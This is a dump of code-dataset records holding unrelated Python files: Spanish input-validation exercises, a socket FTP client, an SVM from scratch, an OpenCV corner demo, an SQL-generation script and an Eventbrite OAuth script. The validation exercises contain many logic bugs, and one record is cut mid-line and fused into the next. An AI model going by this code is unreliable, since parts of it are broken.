run(Scene())\n","sub_path":"graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":8388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"415652401","text":"\n#ejercicio 01 \"validacion de un entero\"\ndef validar_un_entero(entero): #se aplica la funcion validar un entero\n if entero.isalnum()==True: #condicion doble\n validacion=\"El numero \"+str(entero)+\" si es entero\" #se guarda un valor en la variable validacion\n return validacion #retorna la variable validacion\n else:\n return False #retorna falso si la condicion es falsa\n #fin_def\n\n#ejercicio 2 \"validacion de una cadena\"\ndef validar_cadena(msg): #se aplica la funcion validar cadena:\n if msg.isalpha()==True:# #se aplica una condicional doble\n validacion_cadena=\"El valor \"+msg+\" si es una cadena \" #se guarda un valor en la variable validacion de cadena\n return validacion_cadena #retorna el valor de la variable validacion cadena\n else:\n return False #retorna falso si la condicion es falsa\n #fin_def\n\n\n#ejercicio 03 \"validacion de ataque y recompensa de un videojuego\"\ndef validar_dano(ataque): #funcion def\n print(\"INDICAR EL TIPO A QUIEN ATACA MELE o RANGO\") #se imprime un comentario inicial\n if ataque.isdigit()==False: #se valida si no es un numero condicion doble\n if ataque==\"MELE\": #condiciones multiples para ver que recommpensa se ganara\n rm=35\n recompensa_mele=\"Su recompensa es de: \"+str(rm)\n return recompensa_mele\n elif ataque==\"RANGO\":\n rr=43\n recompensa_rango=\"Su recompensa es de: \"+str(rr)\n return recompensa_rango\n else:\n comando=\"el comando ingresado es FALSO\"\n return comando\n else:\n return False\n#fin_def\n\n\n#ejercicio 04 \"validacion de impresion de numeros de 3 digitos\"\ndef validar_numero_tres_cifras(numero):#funcion def\n #validando si es de tres cifras\n if len(numero)==3:\n #validando si es entero\n if numero.isdigit()==True:\n return True\n\n else:\n return False\n else:\n return False\n#fin_def\n\n\n#ejercicio 05 \"validacion de una vocal\"\ndef validar_vocal(vocal):\n #validando la longitud\n if len(vocal)==1:\n #validando si es una vaocal ingresada\n if vocal==\"a\" or vocal==\"e\" or vocal==\"i\" or vocal==\"o\" or vocal==\"u\" :\n return True\n else:\n return False\n else:\n return False\n\n #fin_def\n\n#ejercicio 06 \"validacion de DNI\"\ndef validar_dni(DNI):\n #primero validamos la longitud de la cadena\n if len(DNI)==8:\n #valdidamos que los datos ingresados sean puros numero enteros\n if DNI.isdigit()==True:\n return True\n else:\n return False\n else:\n return False\n\n#ejercicio 07 \"validar Ruc SUNAT\"\ndef validar_ruc(RUC):\n fragmento=validar_dni(\"\")\n #primero validamos la longitud de la cadena que consta de 11 digitos\n if len(RUC)==11:\n #segundo validamos las condiciones de la cadena\n if RUC[0:2]==10:\n print(\"la persona es un trabajador fisico o natural\")\n #una ves que validamos todas las condiciones de la cadena sigue validar el numero de dni\n #para eso creamos una variable a al que llamemos a la funcion validar dni\n if RUC[2:11]==fragmento:\n #por ultimo hacemos la validacion delultimo codigo que siempre debe ser de 8\n if RUC[11]==8:\n print(\"el codigo es correcto\") #una ves que hicimos la validacion de la cadena lo que haremos finalmente es verificar si es int\n if RUC.isdigit()==True:\n return True\n else:\n return False\n else:\n return False\n else:\n return False\n elif RUC[0:2]==20:\n print(\"la persona es una trabajador fisico\")\n if RUC[2:11]==fragmento:\n if RUC[11]==8:\n print(\"el codigo es correcto\")\n if RUC.isdigit()==True:\n return True\n else:\n return False\n else:\n return False\n elif RUC[0:2]==15:\n print(\"La persona es una socidad \")\n if RUC[2:11]==fragmento:\n if RUC[11]==8:\n print(\"el codigo es correcto\")\n if RUC.isdigit()==True:\n return True\n else:\n return False\n else:\n return False\n elif RUC[0:2]==16:\n print(\"se menciona como valido\")\n if RUC[2:11]==fragmento:\n if RUC[11]==8:\n print(\"el codigo es correcto\")\n if RUC.isdigit()==True:\n return True\n else:\n return False\n else:\n return False\n elif RUC[0:2]==17:\n print(\"inscripcion durante 2019 a 2025\")\n if RUC[2:11]==fragmento:\n if RUC[11]==8:\n print(\"el codigo es correcto\")\n if RUC.isdigit()==True:\n return True\n else:\n return False\n else:\n return False\n else:\n\n return False\n\n else:\n return False\n\n\n\n#ejercicio 08 \"validar un numero capicua\"\n\ndef validar_capicua(capicua):\n #primero validamos que sea int\n if capicua.isdigit()==True:\n #segundo para que un numero sea capicua tiene que ser igual que su inversa entonces\n if capicua==capicua[::-1]:\n return True\n else:\n return False\n else:\n return False\n\n #fin_si\n#fin_def\n\n\n#ejercicio 09 \"validar edad\"\ndef validar_edad(edad):\n #primero validar si es entero\n if edad.isdigit()==True:\n if edad>0 and edad<120:\n return True\n else:\n return False\n\n else:\n return False\n #fin_si\n\n#fin_def\n\n#ejercicio 10 \"validar codigo de alumno de UNPRG\"\ndef validar_codigo_unprg(codigo):\n #primero validamos la longitud de la cadena\n if len(codigo)==7:\n #validacion de los dos primero digitos\n if codigo[0:2]==19:\n #validamos la ultima parte de la cadena\n if codigo[7].isdigit()==True:\n #validamos que una parte de la cadena sea numeros\n if codigo[0:7].isdigit()==True:\n return True\n else:\n return False\n #fin_si\n else:\n return False\n #fin_si\n else:\n return False\n #fin_si\n else:\n return False\n #fin_si\n\n#fin_def\n\n#ejercicio 11 \"validacion de una fuerza realizada\"\ndef validar_fuerza(masa,aceleracion):\n #primero validamos el numero ingresado que sea un real\n fuerza=int(masa)*int(aceleracion)\n fuerza_cero=\"La fuerza realizada es cero ya que la aceleracion es igual a 0\"\n if masa.isdigit()==True:\n if aceleracion.isdigit()==True:\n if fuerza==0:\n return fuerza_cero\n elif fuerza>0:\n return fuerza\n else:\n return -1*fuerza\n\n else:\n return False\n else:\n return False\n #fin_si\n#fin_def\n\n#ejercicio 12 \"validar un interruptor\"\ndef validar_interruptor(comando):\n #validar que sea un str:\n on=\"prendido\"\n oof=\"apagado\"\n if comando.isalpha()==True:\n #una ves que validamos que sea un str colocamos las condiciones\n if comando.upper()==\"ON\":\n return on\n elif comando.upper()==\"OOF\":\n return oof\n else:\n return False\n else:\n return False\n\n\n #fin_si\n\n#ejercicio 13 \"lanzamiento de un balon de basket\"\ndef validar_lanzamiento(distancia):\n #validamos primeramente la longitud de la cadena\n if len(distancia[0])>0 and len(distancia[0])<=3:\n #validamos que sea alfanumerico\n\n if distancia.isalnum()==True:\n\n if len(distancia)==2:\n #validamos que tenga el signo al final\n if distancia[1]==\"m\":\n if int(distancia[0])>=6:\n print(\"fue anotacion de 3\")\n else:\n print(\"FUE anotacion de 2\")\n else:\n return False\n elif len(distancia)==3:\n if distancia[2]==\"m\":\n if int(distancia[0])>=6:\n print(\"fue anotacion 3\")\n else:\n print(\"fue anotacion de 2\")\n else:\n return False\n else:\n return False\n else:\n return False\n else:\n return False\n\n#ejercicio 14 \"numero telefonico de peru ejemplo \"+51973396201\" \"\ndef validar_numero_peru(telefono):\n #validamos la longitud de la cadena\n if len(telefono)==12:\n #validamos el valor inicial\n if telefono[0]==\"+\":\n #validamos los dos siguientes digitos\n if telefono[1:3]==51:\n if telefono[1:].isdigit()==True:\n return True\n else:\n return False\n else:\n return False\n else:\n return False\n else:\n return False\n\n\n#ejercicio 15 \"validar un factorial\"\n\ndef validar_factorial(cifras,factorial):\n cif=1\n #validamos la longitud de cualquier factorial y a la vez estamos validando de que no sea un numero negativo\n if cifras+1==len(factorial):\n #validamos el ingreso de factoriales\n if factorial[cifras+1]==\"!\":\n #validamos que sean numeros\n if factorial[0:cifras+1].isdigit()==True:\n #una vez que validamos esttablecemos condiciones\n #si es facotrial d euno o cero retorna automaticamente un 1 si no se hara el calculo respectivoy retornara la variable factor\n if factorial==\"1!\" or factorial==\"0!\":\n return 1\n else:\n for i in range(2,factorial[0:cifras+1]):\n cif*=i\n return cif\n else:\n return False\n else:\n return False\n else:\n return False\n #FIN_SI\n\n#fin_def\n\n#ejercicio 16 \"validar el comando de un videojuego\"\ndef valida_salto(hop):\n pos=1\n letra=\"\"\n numero=\"\"\n direccion=\"\"\n if len(hop)==13:\n for iteam in hop.split(\" \"):\n if pos==1:\n iteam=letra\n if letra.isdigit()==False:\n return True\n else:\n return False\n if pos==2:\n iteam=numero\n if numero.isalpha()==False:\n return True\n else:\n return False\n if pos==3:\n iteam=direccion\n if direccion.isdigit()==False:\n return True\n else:\n return False\n else:\n return False\n\n\n#ejercicio 17 \"validar la hora ingresada ejemplo 03:34 am\"\ndef validar_hora(horario):\n pico_del_dia=\"12:00 m\"\n #validamos la longitud\n if len(horario)==8:\n #validamos la estructura de la cadena\n if horario[0:2].isdigit()==True:\n if horario[2]==\":\":\n if horario[3:5].isdigit()==True:\n if horario[5]==\" \":\n if horario[6:]==\"am\":\n return True\n elif horario[6:]==\"pm\":\n return True\n else:\n return False\n else:\n return False\n else:\n return False\n else:\n return False\n else:\n return False\n elif len(horario)==7:\n return pico_del_dia\n else:\n return False\n\n\n\n#ejercicio 18 \"validar un numero mayo de 2 cifras en donde si es mayor retorna el numero mayor\"\ndef validar_mayor(num1,num2):\n #validamos la longitud\n if len(num1)==2 and len(num2):\n #validamos si la cadena esta compuesta de digitos\n if num1.isdigit()==True and num2.isdigit()==True:\n #validamos que sea mayor\n if num1>num2:\n return num1\n else:\n return False\n else:\n return False\n else:\n return False\n\n\n#ejercicio 19 \"validar un numero menor de 2 cifras en donde si es menor retorna el menor\"\ndef validar_menor(numero1,numero2):\n #validamos la longitud\n if len(numero1)==2 and len(numero2):\n #VALIDAMOS QUE LA CADENA ESTE COMPUESTA DE NUMEROS\n if numero1.isdigit()==True and numero2.isdigit()==True:\n #validamos que sea menor\n if numero1>>:').strip()\n if not cmd:\n continue\n cmd_list = cmd.split(' ')\n command = cmd_list[0]\n if hasattr(self, command):\n func = getattr(self, command)\n func(cmd_list)\n else:\n print('命令格式输入有误')\n\n def put(self, args):\n # 规范化文件路径,os.path.normpath在linux平台无效\n file_path = os.path.normpath(args[-1])\n if not os.path.exists(file_path):\n print('要上传的文件不存在')\n # 此处调用return是为了防止else语句块过大\n return\n else:\n file_size = os.stat(file_path).st_size\n # 发送头信息\n headers_dict = {'command': args[0], 'filename': os.path.basename(file_path), 'filesize': file_size}\n headers_json = json.dumps(headers_dict)\n headers_bytes = headers_json.encode(self.coding)\n # 注意,struct发的是长度,先把头的长度再发过去,然后在send头信息,server取固定的头长度得到头信息长度,根据\n # 头长度取得头信息,因此这里的两次send不会粘包,因为有头信息来控制\n self.socket.send(struct.pack('i', len(headers_bytes)))\n self.socket.send(headers_bytes)\n\n send_size = 0\n with open(file_path, 'rb') as f:\n for line in f:\n already_send_size = len(line)\n self.socket.send(line)\n send_size += already_send_size\n # print(send_size)\n else:\n print('upload success')\n\n def get(self, args):\n headers_dict = {'command': args[0], 'filename': args[-1]}\n headers_json = json.dumps(headers_dict)\n headers_bytes = headers_json.encode(self.coding)\n headers_length = len(headers_bytes)\n self.socket.send(struct.pack('i', headers_length))\n self.socket.send(headers_bytes)\n\n headers_struct = self.socket.recv(4)\n headers_length = struct.unpack('i', headers_struct)[0]\n headers_str = self.socket.recv(headers_length)\n headers_dict = json.loads(headers_str)\n err_msg = headers_dict.get('err_msg', None)\n if err_msg:\n print(err_msg)\n return\n file_path = os.path.join(self.client_dir, args[-1])\n print(file_path)\n filesize = headers_dict.get('file_size')\n already_recv_size = 0\n with open(file_path, 'wb') as f:\n while already_recv_size < filesize:\n recv_data = self.socket.recv(self.max_package_size)\n f.write(recv_data)\n already_recv_size += len(recv_data)\n\nif __name__ == '__main__':\n obj = FTPClient(('192.168.0.98', 13140))\n obj.run()\n\n\n\n","sub_path":"day39/ftpclient.py","file_name":"ftpclient.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"115545724","text":"import os\r\n\r\ninput_file = open(\"input_large.in\", \"r\")\r\noutput_file = open(\"output_large.txt\", \"w\")\r\n\r\ncases = int(input_file.readline())\r\n\r\nfor i in range(cases):\r\n\tstack = list(input_file.readline()[0:-1])\r\n\tlast = \"\"\r\n\tclean_stack = []\r\n\tfor p in stack:\r\n\t\tif p != last:\r\n\t\t\tclean_stack.append(p)\r\n\t\tlast = p\r\n\r\n\tfrowns = clean_stack.count(\"-\") * 2\r\n\tif clean_stack[0] == \"-\":\r\n\t\tfrowns -= 1\r\n\r\n\toutput_file.write(\"Case #\" + str(i+1) + \": \" + str(frowns) + \"\\n\")","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_PartlyGloudy_Revenge of the Pancakes.py","file_name":"16_0_2_PartlyGloudy_Revenge of the Pancakes.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"355570550","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nfrom matplotlib import style\r\n\r\nstyle.use(\"ggplot\")\r\n\r\nclass support_vector_machine:\r\n def __init__ (self, visualisation = True):\r\n self.visualisation = visualisation\r\n self.colors = {1: \"r\", -1: \"b\"}\r\n if self.visualisation:\r\n self.fig = plt.figure()\r\n self.ax = self.fig.add_subplot(1, 1, 1)\r\n \r\n def fit (self, data):\r\n self.data = data\r\n # {||w||: [w, b]} \r\n opt_dict = {}\r\n transforms = [[1, 1], [1, -1], [-1, 1], [-1, -1]]\r\n \r\n all_data = []\r\n for y_i in self.data:\r\n for feature_set in self.data[y_i]:\r\n for feature in feature_set:\r\n all_data.append(feature)\r\n \r\n self.max_feature_value = max(all_data)\r\n self.min_feature_value = min(all_data)\r\n all_data = None\r\n \r\n step_sizes = [self.max_feature_value * 0.1, self.max_feature_value * 0.01, self.max_feature_value * 0.001]\r\n b_range_multiple = 5\r\n b_multiple = 5\r\n \r\n latest_optimum = self.max_feature_value * 10\r\n \r\n for step in step_sizes: \r\n w = np.array([latest_optimum, latest_optimum])\r\n # SVM is always a convex optimisation problem\r\n optimised = False\r\n \r\n while not optimised:\r\n for b in np.arange(-1 * (self.max_feature_value * b_range_multiple), self.max_feature_value * b_range_multiple, step * b_multiple):\r\n for transformation in transforms:\r\n w_t = w * transformation\r\n found_option = True\r\n for i in self.data:\r\n for x_i in self.data[i]:\r\n y_i = i\r\n if not y_i * (np.dot(w_t, x_i) + b) >= 1:\r\n found_option = False\r\n \r\n if found_option:\r\n opt_dict[np.linalg.norm(w_t)] = [w_t, b]\r\n \r\n if w[0] < 0:\r\n optimised = True\r\n print(\"Optimised a step\")\r\n else:\r\n w = w - step\r\n \r\n norms = sorted([n for n in opt_dict])\r\n opt_choice = opt_dict[norms[0]]\r\n \r\n self.w = opt_choice[0]\r\n self.b = opt_choice[1]\r\n latest_optimum = opt_choice[0][0] + step * 2\r\n \r\n \r\n def predict (self, features):\r\n classification = np.sign(np.dot(np.array(self.w), self.w) + self.b)\r\n \r\n if classification != 0 and self.visualisation:\r\n self.ax.scatter(features[0], features[1], s = 200, marker = \"*\", color = self.colors[classification])\r\n \r\n return classification\r\n \r\n def visualise (self):\r\n [[self.ax.scatter(x[0], x[1], s = 100, color = self.colors[i]) for x in data_dict[i]] for i in data_dict]\r\n \r\n def hyper_plane (x, w, b, v):\r\n return (-w[0] * x - b + v) / w[1]\r\n \r\n data_range = (self.min_feature_value * 0.9, self.max_feature_value * 1.1)\r\n hyp_x_min = data_range[0]\r\n hyp_x_max = data_range[1]\r\n \r\n psv_1 = hyper_plane(hyp_x_min, self.w, self.b, 1)\r\n psv_2 = hyper_plane(hyp_x_max, self.w, self.b, 1)\r\n self.ax.plot([hyp_x_min, hyp_x_max], [psv_1, psv_2])\r\n \r\n nsv_1 = hyper_plane(hyp_x_min, self.w, self.b, -1)\r\n nsv_2 = hyper_plane(hyp_x_max, self.w, self.b, -1)\r\n self.ax.plot([hyp_x_min, hyp_x_max], [nsv_1, nsv_2])\r\n \r\n db_1 = hyper_plane(hyp_x_min, self.w, self.b, 0)\r\n db_2 = hyper_plane(hyp_x_max, self.w, self.b, 0)\r\n self.ax.plot([hyp_x_min, hyp_x_max], [db_1, db_2])\r\n \r\n plt.show()\r\n \r\n \r\ndata_dict = {-1: np.array([[1, 7], [2, 8], [3, 8]]), 1: np.array([[5, 1], [6, -1], [7, 3]])}\r\nsvm = support_vector_machine()\r\nsvm.fit(data = data_dict)\r\nsvm.visualise()","sub_path":"svm_from_scratch.py","file_name":"svm_from_scratch.py","file_ext":"py","file_size_in_byte":4081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"244263475","text":"import numpy as np\n\nclass Base:\n\n gen = None\n\n def __init__(self, generator):\n print(\"Importing base...\")\n self.gen = generator\n self.gen.functionList.append(\"addall [r] [g] [b] [a]\")\n self.gen.functionList.append(\"setall [r] [g] [b] [a]\")\n self.gen.functionList.append(\"set [x] [y] [r] [g] [b] [a]\")\n self.gen.commands[\"addall\"] = self.addall\n self.gen.commands[\"setall\"] = self.setall\n self.gen.commands[\"set\"] = self.set\n \n def addall(self, r, g, b, a):\n colorVector = np.fromstring(r + \" \" + g + \" \" + b + \" \" + a, dtype=int, sep=' ')\n \n print(\"adding \" + str(colorVector) + \" to all pixels...\") # DEBUG\n\n self.gen.imgArray = self.gen.imgArray + colorVector\n self.gen.imgArray = np.clip(self.gen.imgArray, 0, 255)\n\n def setall(self, r, g, b, a):\n colorVector = np.fromstring(r + \" \" + g + \" \" + b + \" \" + a, dtype=int, sep=' ')\n \n print(\"setting all pixels to \" + str(colorVector) + \"...\") # DEBUG\n \n for y in range(0, self.gen.imgHeight):\n for x in range(0, self.gen.imgWidth):\n self.gen.imgArray[y][x] = colorVector\n \n def set(self, x, y, r, g, b, a, verbose=True):\n colorVector = np.fromstring(r + \" \" + g + \" \" + b + \" \" + a, dtype=int, sep=' ')\n print(\"setting pixel at (\" + str(x) + \",\" + str(y) + \") to \" + str(colorVector) + \"...\") # DEBUG\n\n self.gen.imgArray[int(y)][int(x)] = colorVector\n","sub_path":"py/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"440543777","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 26 13:14:30 2014\n\n@author: Scott Will, SUNY Buffalo, Department of Electrical Engineering\n\"\"\"\n\nimport cv2\nimport numpy as np\n\ncv2.destroyAllWindows()\n\n# Read in the target image\nfilename = '../../data/m7/IMG_0290.JPG'\nimg = cv2.imread(filename)\n\n# Convert BGR to HSV\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n# define range of red color in HSV\nlower_red = np.array([0, 0, 0])\nupper_red = np.array([5, 255, 255])\n\n# Threshold the HSV image to get only red colors\nmask = cv2.inRange(hsv, lower_red, upper_red)\n\n# Bitwise-AND mask and original image\nres = cv2.bitwise_and(img, img, mask=mask)\n\n# Convert to grayscale\ngray = cv2.cvtColor(res, cv2.COLOR_BGR2GRAY)\ngray = np.float32(gray)\n\n# Run Harris corner detection\n# Arguments: (image, blocksize, sobel aperture size, free parameter)\ndst = cv2.cornerHarris(gray, 2, 3, 0.04)\n\n# Result is dilated for marking the corners, not important\ndst = cv2.dilate(dst, None)\n\n# Threshold for an optimal value, it may vary depending on the image.\nimg[dst > 0.01*dst.max()] = [0, 0, 255]\n\ncv2.imshow('dst', img)\ncv2.waitKey()\n","sub_path":"src/legacy/harris.py","file_name":"harris.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"172706750","text":"import xlrd\nimport datetime\n\nprovinces = {'黑龙江','青海','陕西','重庆','辽宁','贵州','西藏','福建','甘肃','湖南','湖北','海南','浙江','河南','河北','江西','江苏','新疆','广西','广东','山西','山东','安徽','宁夏','天津','四川','吉林','北京','内蒙古','云南','上海','31省'}\nprovince_ids = {'451','971','290','230','240','851','891','591','931','731','270','898','571','371','311','791','250','991','771','200','351','531','551','951','220','280','431','100','471','871','210'}\n\ndef hasProvince(channels):\n for province in provinces:\n if channels.find(province) > -1:\n return True\n\nchannel_delete = \"DELETE FROM PRODUCT.PM_PRODUCT_CHANNEL_CFG WHERE PRODUCT_ID = {0} AND CHANNEL_ID = {1};\"\nchannel_insert = \"INSERT INTO PRODUCT.PM_PRODUCT_CHANNEL_CFG (PRODUCT_ID, CHANNEL_ID, INURE_TIME, EXPIRE_TIME, OPR_CODE, EFFT_TYPE) VALUES ({0}, {1}, SYSDATE, TO_DATE('3000-01-01 00:00:00', 'YYYY-MM-DD HH24:MI:SS'), {2}, '{3}');\"\ndef openChannel(product_id,opr_list,out):\n for province_id in province_ids:\n print(channel_delete.format(product_id,province_id),file=out)\n for opr in opr_list:\n for i in range(1,5):\n print(channel_insert.format(product_id,province_id,opr,i),file=out)\n print(\"\",file=out)\n\n\nsync_delete = \"DELETE FROM CUSTOMER.CC_SYNC_ORDER_CONFIG WHERE PRODUCT_ID = '{0}' AND ROUTE_VALUE = '{1}';\"\nsync_insert = \"INSERT INTO CUSTOMER.CC_SYNC_ORDER_CONFIG (CONFIG_ID, PRODUCT_ID, ROUTE_VALUE, STATUS) VALUES (CUSTOMER.SEQ_SYNC_ORDER_CONFIG.NEXTVAL, '{0}', '{1}', '1');\"\ndef openProvince(product_id,out):\n for province_id in province_ids:\n print(sync_delete.format(product_id,province_id),file=out)\n print(sync_insert.format(product_id,province_id),file=out)\n print(\"\",file=out)\n\nopr_map = {\n 5: '7', # 资源勘查\n 6: '8', # 资源预占\n 7: '9', # 预占延期\n 8: '10', # 预占取消\n 9: '1', # 产品开通\n 10: '5', # 资费变更\n 11: '6', # 资源变更\n 12: '23', # 产品续订\n 13: '3', # 业务暂停\n 14: '4', # 业务恢复\n 15: '2', # 业务注销\n 16: '25', # 成员管理\n 17: '44', # 密码重置\n 18: '11', # 系统暂停\n 19: '80', # 产品审批\n 20: '12' # 系统恢复\n}\n\ndef getAllProducts(sheet):\n product_list = set()\n for rowx in range(1,sheet.nrows):\n product_id = sheet.cell_value(rowx,2)\n channels = sheet.cell_value(rowx,3)\n if product_id != '':\n if hasProvince(channels):\n product_list.add(product_id)\n return product_list\n\ndef getAllOprations(product_list,sheet):\n channels = { x : [] for x in product_list }\n for rowx in range(1,sheet.nrows):\n pid = sheet.cell_value(rowx,1)\n if pid in channels:\n oprs = channels[pid]\n opr = sheet.cell_value(rowx,2)\n effType = sheet.cell_value(rowx,4)\n oprs.append([opr,effType])\n return channels\n\n\ndef openChannel1(opr_map,out):\n for p_id in opr_map:\n for province_id in province_ids:\n print(channel_delete.format(p_id,province_id),file=out)\n for oprs in opr_map[p_id]:\n print(channel_insert.format(p_id,province_id,oprs[0],oprs[1]),file=out)\n print(\"\",file=out)\n\n\ntimestamp = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\nprint_file1 = r'D:/Workspaces/channel_{}.sql'.format(timestamp)\nprint_file2 = r'D:/Workspaces/province_{}.sql'.format(timestamp)\n\ndef printSQL(file1,file2):\n ''' print sql to file''' \n excel = xlrd.open_workbook(r'D:\\Workspaces\\SVN\\EBOSS\\trunk\\01_需求分析\\02-产品需求\\政企EBOSS产品树.xlsx')\n sheet = excel.sheet_by_name(u'产品受理操作')\n with open(file1, encoding='utf8', mode='a') as a_file,open(file2,encoding='utf8',mode='a') as b_file:\n for rowx in range(1,sheet.nrows):\n product_id = sheet.cell_value(rowx,2)\n channels = sheet.cell_value(rowx,3)\n oprs = [ opr_map[x] for x in range(5,21) if sheet.cell_value(rowx,x) == 'Y' ]\n if product_id != '':\n if hasProvince(channels):\n openChannel(product_id,oprs,a_file)\n openProvince(product_id,b_file)\n print(\"\",file=a_file)\n print(\"\",file=b_file)\n\ndef printChannelSQL(file):\n excel = xlrd.open_workbook(r'D:\\Workspaces\\SVN\\EBOSS\\trunk\\01_需求分析\\02-产品需��\\政企EBOSS产品树.xlsx')\n sheet1 = excel.sheet_by_name(u'产品受理操作')\n product_list = getAllProducts(sheet1)\n sheet2 = excel.sheet_by_name(u'产品订购及账期生效规则')\n opr_map = getAllOprations(product_list,sheet2)\n with open(file, encoding='utf8', mode='a') as a_file:\n openChannel1(opr_map,a_file)\n\nprintChannelSQL(print_file1)","sub_path":"python/product/AllProvince.py","file_name":"AllProvince.py","file_ext":"py","file_size_in_byte":4881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"118585212","text":"import webbrowser\nimport json\nimport requests\nimport requests_oauthlib\nfrom functools import reduce\nimport csv\nfrom eb_data import CLIENT_ID, CLIENT_SECRET, personal_token\nimport sys\nfrom datetime import datetime\n\nDATETIME_FORMAT = \"%Y-%m-%d %H:%M:%S.%f\"\nAUTHORIZATION_URL = 'https://www.eventbrite.com/oauth/authorize'\nTOKEN_URL = 'https://www.eventbrite.com/oauth/token'\nREDIRECT_URI = 'https://www.programsinformationpeople.org/runestone/oauth'\n\nHARVEY_CACHE_FNAME = \"harvey_cache_contents.json\"\nCONCERT_CACHE_FNAME = \"concert_cache_contents.json\"\n\n#--------------------------------------------------\n# Load cache files: data and credentials\n#--------------------------------------------------\n# Load data cache\ndef check_if_cached(fname):\n try:\n with open(fname, 'r') as cache_file:\n cache_json = cache_file.read()\n CACHE_DICTION = json.loads(cache_json)\n except:\n CACHE_DICTION = {}\n return CACHE_DICTION\n\ndef has_cache_expired(timestamp_str, expire_in_days):\n \"\"\"Check if cache timestamp is over expire_in_days old\"\"\"\n # gives current datetime\n now = datetime.now()\n\n # datetime.strptime converts a formatted string into datetime object\n cache_timestamp = datetime.strptime(timestamp_str, DATETIME_FORMAT)\n\n # subtracting two datetime objects gives you a timedelta object\n delta = now - cache_timestamp\n delta_in_days = delta.days\n\n # now that we have days as integers, we can just use comparison\n # and decide if cache has expired or not\n if delta_in_days > expire_in_days:\n return True # It's been longer than expiry time\n else:\n return False\n\n# This is just for testing\nHARVEY_CACHE_DICTION = check_if_cached(HARVEY_CACHE_FNAME)\nCONCERT_CACHE_DICTION = check_if_cached(CONCERT_CACHE_FNAME)\n\ndef get_saved_token():\n with open('token.json', 'r') as f:\n token_json = f.read()\n token_dict = json.loads(token_json)\n\n return token_dict\n\n\ndef save_token(token_dict, expire_in_days):\n token_dict['timestamp'] = datetime.now().strftime(DATETIME_FORMAT)\n token_dict['expire_in_days'] = expire_in_days\n with open('token.json', 'w') as f:\n token_json = json.dumps(token_dict)\n f.write(token_json)\n\n\ndef get_eventbrite_cache(search_params, CACHE_FNAME, expire_in_days=7, force_download=False):\n CACHE_DICTION = check_if_cached(CACHE_FNAME)\n token_expired = False\n # if we need to get an oauth2 session started\n if CACHE_DICTION == {} or force_download:\n # see if we have the token\n try:\n token = get_saved_token()\n except FileNotFoundError:\n token = None\n\n if token:\n if not has_cache_expired(token['timestamp'], token['expire_in_days']):\n print('Token already saved and not expired')\n oauth2inst = requests_oauthlib.OAuth2Session(CLIENT_ID, token=token)\n else:\n print('token has expired, will need to get a new one')\n token_expired=True\n\n if token is None or token_expired:\n print('Getting token the long way')\n oauth2inst = requests_oauthlib.OAuth2Session(CLIENT_ID, redirect_uri=REDIRECT_URI) # Create an instance of an OAuth2Session\n\n # get the authorization url to send the user to\n authorization_url, state = oauth2inst.authorization_url(AUTHORIZATION_URL)\n\n # Opening auth URL for you to sign in to the EventBrite service\n webbrowser.open(authorization_url) \n authorization_response = input('Authenticate and then enter the full callback URL: ').strip() # Need to get the full URL in order to parse the response\n\n # The OAuth2Session instance has a method that extracts what we need from the url, and helps do some other back and forth with EB\n token = oauth2inst.fetch_token(TOKEN_URL, authorization_response=authorization_response, client_secret=CLIENT_SECRET)\n save_token(token, expire_in_days=expire_in_days)\n \n\n\n print('Token saved. Getting search results')\n r = oauth2inst.get('https://www.eventbriteapi.com/v3/events/search/', params=search_params)\n\n # the result is now a dictionary\n response_diction = json.loads(r.text)\n with open(CACHE_FNAME, 'w') as cache_file:\n print('caching result as:', CACHE_FNAME)\n for event in response_diction['events']:\n CACHE_DICTION[event['id']] = event\n cache_json = json.dumps(CACHE_DICTION, indent=2)\n cache_file.write(cache_json)\n else:\n print(\"{} already saved as cache, will return it\".format(CACHE_FNAME))\n \n return CACHE_DICTION\n\n\n\n\nclass Event(object):\n def __init__(self, event_dict):\n self.event = event_dict\n self.id = self.event.get('id')\n self.name = self.event.get('name', {}).get('text')\n\n self.capacity = self.event.get('capacity')\n self.url = self.event.get('url')\n self.is_free = self.event.get('is_free')\n self.description = self.event.get('description', {}).get('text')\n\n self.get_data()\n\n def get_data(self, key_list=[('id',), ('name', 'text'), ('capacity',),\n ('url',), ('is_free',),\n ('description', 'text')]):\n self.data = {}\n for key in key_list:\n try:\n self.data[','.join(key)] = reduce(dict.get, key, self.event)\n except:\n self.data[','.join(key)] = None\n\n def __str__(self):\n return \"{0}: {1}\".format(self.id, self.name)\n\n\ndef write_to_csv(event_list, filename):\n with open(filename, 'w') as outfile:\n outwriter = csv.writer(outfile, delimiter=',')\n keys = event_list[0].data.keys()\n header = list(keys)\n outwriter.writerow(header)\n\n for event in event_list:\n row = list(event.data.values())\n outwriter.writerow(row)\n\n\nif __name__ == '__main__':\n try:\n force_download = sys.argv[1].lower() == 'true'\n except:\n force_download = False\n\n harvey_search_params = {'q':'Hurricane Harvey',\n \"location.address\":'6100 Main St, Houston, TX 77005',\n 'location.within':'30mi'}\n concert_search_params = {'q':'concert',\n 'location.address': \"500 S State St, Ann Arbor, MI 48109\",\n 'location.within':'20mi'}\n\n harvey_response = get_eventbrite_cache(harvey_search_params, \n HARVEY_CACHE_FNAME,\n force_download=force_download)\n\n concert_response = get_eventbrite_cache(concert_search_params,\n CONCERT_CACHE_FNAME,\n force_download=force_download)\n\n harvey_event_list = [Event(event_dict) for event_dict in harvey_response.values()]\n concert_event_list = 